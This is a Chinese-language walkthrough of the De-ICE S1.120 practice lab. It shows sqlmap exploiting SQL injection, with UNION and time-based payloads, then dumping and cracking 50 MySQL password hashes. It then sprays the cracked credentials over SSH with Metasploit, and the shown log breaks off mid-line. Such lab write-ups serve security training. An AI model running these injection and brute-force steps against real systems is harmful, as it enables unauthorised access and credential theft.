下载地址
http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso
任务信息
Various 'internal' documents
实战演练
原文再续,书接上文s1.100的系统
信息收集
netdiscover发现IP是192.168.1.120
使用anonymous登录,发现没什么东西
用原先的密码发现登录不了
我们来看看web系统
使用burpsuite抓包
将这个数据包保存下来使用sqlmap测试有没有注入漏洞
这个不存在,换另外一个页面
发现存在注入漏洞
使用sqlmap获取用户名和密码
root@kali:/tmp# sqlmap -r 2 --users --passwords
___
__H__
___ ___[(]_____ ___ ___ {1.3#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:57:51 /2019-02-27/
[20:57:51] [INFO] parsing HTTP request from '2'
[20:57:51] [INFO] resuming back-end DBMS 'mysql'
[20:57:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2998=2998
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176717171,0x63584353424a59567a6e52636942566d78746a676471796f446e70746d6862735849517846427372,0x717a6b7671),NULL,NULL-- JSxW
---
[20:57:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL >= 5.0.12
[20:57:51] [INFO] fetching database users
database management system users [50]:
[*] 'aadams'@'localhost'
[*] 'aallen'@'localhost'
[*] 'aard'@'localhost'
[*] 'aharp'@'localhost'
[*] 'aheflin'@'localhost'
[*] 'amaynard'@'localhost'
[*] 'aspears'@'localhost'
[*] 'aweiland'@'localhost'
[*] 'bbanter'@'localhost'
[*] 'bphillips'@'localhost'
[*] 'bwatkins'@'localhost'
[*] 'cchisholm'@'localhost'
[*] 'ccoffee'@'localhost'
[*] 'dcooper'@'localhost'
[*] 'dgilfillan'@'localhost'
[*] 'dgrant'@'localhost'
[*] 'djohnson'@'localhost'
[*] 'dstevens'@'localhost'
[*] 'dtraylor'@'localhost'
[*] 'dwestling'@'localhost'
[*] 'hlovell'@'localhost'
[*] 'jalcantar'@'localhost'
[*] 'jalvarez'@'localhost'
[*] 'jayala'@'localhost'
[*] 'jbresnahan'@'localhost'
[*] 'jdavenport'@'localhost'
[*] 'jduff'@'localhost'
[*] 'jfranklin'@'localhost'
[*] 'kclemons'@'localhost'
[*] 'krenfro'@'localhost'
[*] 'ktso'@'localhost'
[*] 'kwebber'@'localhost'
[*] 'lmartinez'@'localhost'
[*] 'lmorales'@'localhost'
[*] 'mbryan'@'localhost'
[*] 'mholland'@'localhost'
[*] 'mnader'@'localhost'
[*] 'mrodriguez'@'localhost'
[*] 'myajima'@'localhost'
[*] 'qpowers'@'localhost'
[*] 'rdominguez'@'localhost'
[*] 'rjacobson'@'localhost'
[*] 'rpatel'@'localhost'
[*] 'sgains'@'localhost'
[*] 'sjohnson'@'localhost'
[*] 'strammel'@'localhost'
[*] 'swarren'@'localhost'
[*] 'tdeleon'@'localhost'
[*] 'tgoodchap'@'localhost'
[*] 'webapp'@'localhost'
[20:57:51] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[20:57:54] [INFO] writing hashes to a temporary file '/tmp/sqlmap8lPFoA3319/sqlmaphashes-fmK_jw.txt'
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[20:57:56] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
[20:58:02] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[20:58:06] [INFO] starting dictionary-based cracking (mysql_passwd)
[20:58:06] [INFO] starting 4 processes
[20:58:06] [INFO] cracked password '0' for user 'lmorales'
[20:58:07] [INFO] cracked password '111111' for user 'jfranklin'
[20:58:07] [INFO] cracked password '12345' for user 'aweiland'
[20:58:07] [INFO] cracked password '123456' for user 'dgilfillan'
[20:58:07] [INFO] cracked password '12345678' for user 'bphillips'
[20:58:07] [INFO] cracked password '123123' for user 'strammel'
[20:58:07] [INFO] cracked password '1234' for user 'ccoffee'
[20:58:07] [INFO] cracked password '1234567' for user 'hlovell'
[20:58:07] [INFO] cracked password '666666' for user 'mbryan'
[20:58:07] [INFO] cracked password '654321' for user 'aallen'
[20:58:08] [INFO] cracked password 'batman' for user 'jayala'
[20:58:08] [INFO] cracked password 'babyl0n' for user 'jdavenport'
[20:58:08] [INFO] cracked password 'baseball' for user 'aadams'
[20:58:08] [INFO] cracked password 'blahblah' for user 'krenfro'
[20:58:08] [INFO] cracked password 'cheese' for user 'lmartinez'
[20:58:08] [INFO] cracked password 'computer' for user 'aheflin'
[20:58:08] [INFO] cracked password 'consumer' for user 'mnader'
[20:58:09] [INFO] cracked password 'football' for user 'cchisholm'
[20:58:09] [INFO] cracked password 'gawker' for user 'rjacobson'
[20:58:09] [INFO] cracked password 'dragon' for user 'ktso'
[20:58:09] [INFO] cracked password 'gizmodo' for user 'rpatel'
[20:58:09] [INFO] cracked password 'internet' for user 'rdominguez'
[20:58:10] [INFO] cracked password 'killer' for user 'bbanter'
[20:58:10] [INFO] cracked password 'jordan' for user 'tgoodchap'
[20:58:10] [INFO] cracked password 'iloveyou' for user 'swarren'
[20:58:10] [INFO] cracked password 'kotaku' for user 'dtraylor'
[20:58:10] [INFO] cracked password 'master' for user 'djohnson'
[20:58:10] [INFO] cracked password 'jennifer' for user 'kclemons'
[20:58:11] [INFO] cracked password 'michael' for user 'bwatkins'
[20:58:11] [INFO] cracked password 'monkey' for user 'sjohnson'
[20:58:11] [INFO] cracked password 'letmein' for user 'dstevens'
[20:58:11] [INFO] cracked password 'lifehack' for user 'aharp'
[20:58:11] [INFO] cracked password 'passw0rd' for user 'aspears'
[20:58:11] [INFO] cracked password 'Password' for user 'jbresnahan'
[20:58:11] [INFO] cracked password 'password' for user 'mrodriguez'
[20:58:11] [INFO] cracked password 'michelle' for user 'jalcantar'
[20:58:11] [INFO] cracked password 'pepper' for user 'dcooper'
[20:58:11] [INFO] cracked password 'princess' for user 'kwebber'
[20:58:11] [INFO] cracked password 'qwerty' for user 'aard'
[20:58:11] [INFO] cracked password 'nintendo' for user 'dgrant'
[20:58:12] [INFO] cracked password 'soccer' for user 'sgains'
[20:58:12] [INFO] cracked password 'shadow' for user 'amaynard'
[20:58:12] [INFO] cracked password 'pokemon' for user 'qpowers'
[20:58:12] [INFO] cracked password 'starwars' for user 'tdeleon'
[20:58:12] [INFO] cracked password 'superman' for user 'jduff'
[20:58:12] [INFO] cracked password 'welcome' for user 'dwestling'
[20:58:12] [INFO] cracked password 'whatever' for user 'jalvarez'
[20:58:12] [INFO] cracked password 'trustno1' for user 'myajima'
[20:58:13] [INFO] cracked password 'sunshine' for user 'mholland'
[20:58:14] [INFO] using suffix '1'
[20:58:21] [INFO] using suffix '123'
[20:58:28] [INFO] using suffix '2'
[20:58:36] [INFO] using suffix '12'
[20:58:43] [INFO] using suffix '3'
[20:58:50] [INFO] using suffix '13'
[20:58:58] [INFO] using suffix '7'
[20:59:05] [INFO] using suffix '11'
[20:59:12] [INFO] using suffix '5'
[20:59:18] [INFO] using suffix '22'
[20:59:25] [INFO] using suffix '23'
[20:59:32] [INFO] using suffix '01'
[20:59:39] [INFO] using suffix '4'
[20:59:46] [INFO] using suffix '07'
[20:59:54] [INFO] using suffix '21'
[21:00:02] [INFO] using suffix '14'
[21:00:09] [INFO] using suffix '10'
[21:00:17] [INFO] using suffix '06'
[21:00:25] [INFO] using suffix '08'
[21:00:33] [INFO] using suffix '8'
[21:00:41] [INFO] using suffix '15'
[21:00:48] [INFO] using suffix '69'
[21:00:56] [INFO] using suffix '16'
[21:01:02] [INFO] using suffix '6'
[21:01:09] [INFO] using suffix '18'
[21:01:16] [INFO] using suffix '!'
[21:01:23] [INFO] using suffix '.'
[21:01:30] [INFO] using suffix '*'
[21:01:37] [INFO] using suffix '!!'
[21:01:43] [INFO] using suffix '?'
[21:01:50] [INFO] using suffix ';'
[21:01:57] [INFO] using suffix '..'
[21:02:03] [INFO] using suffix '!!!'
[21:02:10] [INFO] using suffix ', '
[21:02:17] [INFO] using suffix '@'
database management system users password hashes:
[*] aadams [1]:
password hash: *51AA306E66303073DBA15D2750E23C90C7A7F947
clear-text password: baseball
[*] aallen [1]:
password hash: *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5
clear-text password: 654321
[*] aard [1]:
password hash: *AA1420F182E88B9E5F874F6FBE7459291E8F4601
clear-text password: qwerty
[*] aharp [1]:
password hash: *79BF466BCC601BD91A0897BB162421F9BA8C29CA
clear-text password: lifehack
[*] aheflin [1]:
password hash: *81101DED975D54BD76A3C8EAD293597AE9BB143F
clear-text password: computer
[*] amaynard [1]:
password hash: *7B2F14D9BB629E334CD49A1028BD85750F7D3530
clear-text password: shadow
[*] aspears [1]:
password hash: *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3
clear-text password: passw0rd
[*] aweiland [1]:
password hash: *00A51F3F48415C7D4E8908980D443C29C69B60C9
clear-text password: 12345
[*] bbanter [1]:
password hash: *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8
clear-text password: killer
[*] bphillips [1]:
password hash: *84AAC12F54AB666ECFC2A83C676908C8BBC381B1
clear-text password: 12345678
[*] bwatkins [1]:
password hash: *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00
clear-text password: michael
[*] cchisholm [1]:
password hash: *FCAAF3F0BD94C027B2769A95903C355CE6294660
clear-text password: football
[*] ccoffee [1]:
password hash: *A4B6157319038724E3560894F7F932C8886EBFCF
clear-text password: 1234
[*] dcooper [1]:
password hash: *626AC8265C7D53693CB7478376CE1B4825DFF286
clear-text password: pepper
[*] dgilfillan [1]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
clear-text password: 123456
[*] dgrant [1]:
password hash: *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9
clear-text password: nintendo
[*] djohnson [1]:
password hash: *8D6A637F37955DBFCE1229204DDBED1CE11E6F41
clear-text password: master
[*] dstevens [1]:
password hash: *D37C49F9CBEFBF8B6F4B165AC703AA271E079004
clear-text password: letmein
[*] dtraylor [1]:
password hash: *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0
clear-text password: kotaku
[*] dwestling [1]:
password hash: *DF216F57F1F2066124E1AA5491D995C3CB57E4C2
clear-text password: welcome
[*] hlovell [1]:
password hash: *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5
clear-text password: 1234567
[*] jalcantar [1]:
password hash: *ED043A01F4583450BC8EB1E83C00C372CA49C4E4
clear-text password: michelle
[*] jalvarez [1]:
password hash: *90837F291B744BBE86DF95A37D2B2524185DBBF5
clear-text password: whatever
[*] jayala [1]:
password hash: *F491287896471CB21030790BF46865C4A39DE651
clear-text password: batman
[*] jbresnahan [1]:
password hash: *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594
clear-text password: Password
[*] jdavenport [1]:
password hash: *61305383748FBEAB119F9A8BC35EBBADB4889A9D
clear-text password: babyl0n
[*] jduff [1]:
password hash: *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E
clear-text password: superman
[*] jfranklin [1]:
password hash: *FD571203974BA9AFE270FE62151AE967ECA5E0AA
clear-text password: 111111
[*] kclemons [1]:
password hash: *B021918A5DCA54916CF724573179571DFC37AC88
clear-text password: jennifer
[*] krenfro [1]:
password hash: *446525BB82B5E22BD9E525261D37C494F623C52B
clear-text password: blahblah
[*] ktso [1]:
password hash: *F8E113FD51D520075836A4B815568BA2B96F7C30
clear-text password: dragon
[*] kwebber [1]:
password hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
clear-text password: princess
[*] lmartinez [1]:
password hash: *7FD9F123C9FC025372A5AAD19D107783CD19CCF7
clear-text password: cheese
[*] lmorales [1]:
password hash: *B12289EEF8752AD620294A64A37CD586223AB454
clear-text password: 0
[*] mbryan [1]:
password hash: *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC
clear-text password: 666666
[*] mholland [1]:
password hash: *D6B63C1953E7F096DB307F8AC48C4AD703E57001
clear-text password: sunshine
[*] mnader [1]:
password hash: *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91
clear-text password: consumer
[*] mrodriguez [1]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
clear-text password: password
[*] myajima [1]:
password hash: *46CFC7938B60837F46B610A2D10C248874555C14
clear-text password: trustno1
[*] qpowers [1]:
password hash: *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC
clear-text password: pokemon
[*] rdominguez [1]:
password hash: *797420C584EBF42750EB523104268BA0FD87FBC8
clear-text password: internet
[*] rjacobson [1]:
password hash: *3EEB06BE54EABF909DC8F6107110777F1DE43186
clear-text password: gawker
[*] rpatel [1]:
password hash: *D183105443FBDE597607B8BC5475A9E1B7847F3E
clear-text password: gizmodo
[*] sgains [1]:
password hash: *94F3DC3F398B76269CAAD51627279D4233A6C89A
clear-text password: soccer
[*] sjohnson [1]:
password hash: *A5892368AE83685440A1E27D012306B073BDF5B7
clear-text password: monkey
[*] strammel [1]:
password hash: *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1
clear-text password: 123123
[*] swarren [1]:
password hash: *CFBF459D9D6057BC2A85477A38327B96F06B1597
clear-text password: iloveyou
[*] tdeleon [1]:
password hash: *24B8599BAF46DD4B4D8DB50A3B10136457492622
clear-text password: starwars
[*] tgoodchap [1]:
password hash: *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC
clear-text password: jordan
[*] webapp [1]:
password hash: *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F
弄个字典做测试用户权限
msf5 > use auxiliary/scanner/ssh/ssh_login msf5 auxiliary(scanner/ssh/ssh_login) > show options Module options (auxiliary/scanner/ssh/ssh_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.120 RHOSTS => 192.168.1.120 msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE test USERPASS_FILE => test msf5 auxiliary(scanner/ssh/ssh_login) > run [+] 192.168.1.120:22 - Success: 'lmorales:0' 'uid=1032(lmorales) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 1 opened (192.168.1.20:40725 -> 192.168.1.120:22) at 2019-02-27 21:48:53 -0500 [+] 192.168.1.120:22 - Success: 'jfranklin:111111' 'uid=1046(jfranklin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 2 opened (192.168.1.20:42317 -> 192.168.1.120:22) at 2019-02-27 21:48:53 -0500 [+] 192.168.1.120:22 - Success: 'aweiland:12345' 'uid=1048(aweiland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 3 opened (192.168.1.20:43443 -> 192.168.1.120:22) at 2019-02-27 21:48:54 -0500 [+] 192.168.1.120:22 - Success: 'dgilfillan:123456' 'uid=1017(dgilfillan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 4 opened (192.168.1.20:46539 -> 192.168.1.120:22) at 2019-02-27 21:48:54 -0500 [+] 192.168.1.120:22 - Success: 'bphillips:12345678' 'uid=1033(bphillips) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 5 opened (192.168.1.20:39633 -> 192.168.1.120:22) at 2019-02-27 21:48:54 -0500 [+] 192.168.1.120:22 - Success: 'strammel:123123' 'uid=1015(strammel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 6 opened (192.168.1.20:44741 -> 192.168.1.120:22) at 2019-02-27 21:48:55 -0500 [+] 192.168.1.120:22 - Success: 'ccoffee:1234' 'uid=1023(ccoffee) gid=100(users) groups=100(users),102(admin) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 7 opened (192.168.1.20:34423 -> 192.168.1.120:22) at 2019-02-27 21:48:55 -0500 [+] 192.168.1.120:22 - Success: 'hlovell:1234567' 'uid=1014(hlovell) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 8 opened (192.168.1.20:35515 -> 192.168.1.120:22) at 2019-02-27 21:48:55 -0500 [+] 192.168.1.120:22 - Success: 'mbryan:666666' 'uid=1019(mbryan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 9 opened (192.168.1.20:36715 -> 192.168.1.120:22) at 2019-02-27 21:48:56 -0500 [+] 192.168.1.120:22 - Success: 'aallen:654321' 'uid=1002(aallen) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 10 opened (192.168.1.20:44879 -> 192.168.1.120:22) at 2019-02-27 21:48:56 -0500 [+] 192.168.1.120:22 - Success: 'jayala:batman' 'uid=1034(jayala) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 11 opened (192.168.1.20:46545 -> 192.168.1.120:22) at 2019-02-27 21:48:57 -0500 [+] 192.168.1.120:22 - Success: 'jdavenport:babyl0n' 'uid=1027(jdavenport) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 12 opened (192.168.1.20:33813 -> 192.168.1.120:22) at 2019-02-27 21:48:57 -0500 [+] 192.168.1.120:22 - Success: 'aadams:baseball' 'uid=1030(aadams) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 13 opened (192.168.1.20:33773 -> 192.168.1.120:22) at 2019-02-27 21:48:57 -0500 [+] 192.168.1.120:22 - Success: 'krenfro:blahblah' 'uid=1038(krenfro) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 14 opened (192.168.1.20:37801 -> 192.168.1.120:22) at 2019-02-27 21:48:58 -0500 [+] 192.168.1.120:22 - Success: 'lmartinez:cheese' 'uid=1008(lmartinez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 15 opened (192.168.1.20:45273 -> 192.168.1.120:22) at 2019-02-27 21:48:58 -0500 [+] 192.168.1.120:22 - Success: 'aheflin:computer' 'uid=1012(aheflin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 16 opened (192.168.1.20:33739 -> 192.168.1.120:22) at 2019-02-27 21:48:58 -0500 [+] 192.168.1.120:22 - Success: 'mnader:consumer' 'uid=1007(mnader) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 17 opened (192.168.1.20:40947 -> 192.168.1.120:22) at 2019-02-27 21:48:59 -0500 [+] 192.168.1.120:22 - Success: 'cchisholm:football' 'uid=1042(cchisholm) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 18 opened (192.168.1.20:32883 -> 192.168.1.120:22) at 2019-02-27 21:48:59 -0500 [+] 192.168.1.120:22 - Success: 'rjacobson:gawker' 'uid=1009(rjacobson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 19 opened (192.168.1.20:41681 -> 192.168.1.120:22) at 2019-02-27 21:49:00 -0500 [+] 192.168.1.120:22 - Success: 'ktso:dragon' 'uid=1022(ktso) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 20 opened (192.168.1.20:34843 -> 192.168.1.120:22) at 2019-02-27 21:49:00 -0500 [+] 192.168.1.120:22 - Success: 'rpatel:gizmodo' 'uid=1029(rpatel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 21 opened (192.168.1.20:43571 -> 192.168.1.120:22) at 2019-02-27 21:49:00 -0500 [+] 192.168.1.120:22 - Success: 'rdominguez:internet' 'uid=1031(rdominguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 22 opened (192.168.1.20:43249 -> 192.168.1.120:22) at 2019-02-27 21:49:01 -0500 [+] 192.168.1.120:22 - Success: 'bbanter:killer' 'uid=1011(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 23 opened (192.168.1.20:34883 -> 192.168.1.120:22) at 2019-02-27 21:49:01 -0500 [+] 192.168.1.120:22 - Success: 'tgoodchap:jordan' 'uid=1045(tgoodchap) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 24 opened (192.168.1.20:46345 -> 192.168.1.120:22) at 2019-02-27 21:49:01 -0500 [+] 192.168.1.120:22 - Success: 'swarren:iloveyou' 'uid=1020(swarren) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 25 opened (192.168.1.20:44831 -> 192.168.1.120:22) at 2019-02-27 21:49:02 -0500 [+] 192.168.1.120:22 - Success: 'dtraylor:kotaku' 'uid=1026(dtraylor) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 26 opened (192.168.1.20:35791 -> 192.168.1.120:22) at 2019-02-27 21:49:02 -0500 [+] 192.168.1.120:22 - Success: 'djohnson:master' 'uid=1037(djohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 27 opened (192.168.1.20:33483 -> 192.168.1.120:22) at 2019-02-27 21:49:02 -0500 [+] 192.168.1.120:22 - Success: 'kclemons:jennifer' 'uid=1040(kclemons) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 28 opened (192.168.1.20:36961 -> 192.168.1.120:22) at 2019-02-27 21:49:03 -0500 [+] 192.168.1.120:22 - Success: 'bwatkins:michael' 'uid=1028(bwatkins) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 29 opened (192.168.1.20:32949 -> 192.168.1.120:22) at 2019-02-27 21:49:03 -0500 [+] 192.168.1.120:22 - Success: 'sjohnson:monkey' 'uid=1024(sjohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 30 opened (192.168.1.20:40099 -> 192.168.1.120:22) at 2019-02-27 21:49:04 -0500 [+] 192.168.1.120:22 - Success: 'dstevens:letmein' 'uid=1039(dstevens) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 31 opened (192.168.1.20:40185 -> 192.168.1.120:22) at 2019-02-27 21:49:04 -0500 [+] 192.168.1.120:22 - Success: 'aharp:lifehack' 'uid=1001(aharp) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 32 opened (192.168.1.20:45919 -> 192.168.1.120:22) at 2019-02-27 21:49:04 -0500 [+] 192.168.1.120:22 - Success: 'aspears:passw0rd' 'uid=1003(aspears) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 33 opened (192.168.1.20:35535 -> 192.168.1.120:22) at 2019-02-27 21:49:05 -0500 [+] 192.168.1.120:22 - Success: 'jbresnahan:Password' 'uid=1041(jbresnahan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 34 opened (192.168.1.20:33807 -> 192.168.1.120:22) at 2019-02-27 21:49:05 -0500 [+] 192.168.1.120:22 - Success: 'mrodriguez:password' 'uid=1013(mrodriguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 35 opened (192.168.1.20:44515 -> 192.168.1.120:22) at 2019-02-27 21:49:05 -0500 [+] 192.168.1.120:22 - Success: 'jalcantar:michelle' 'uid=1025(jalcantar) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP 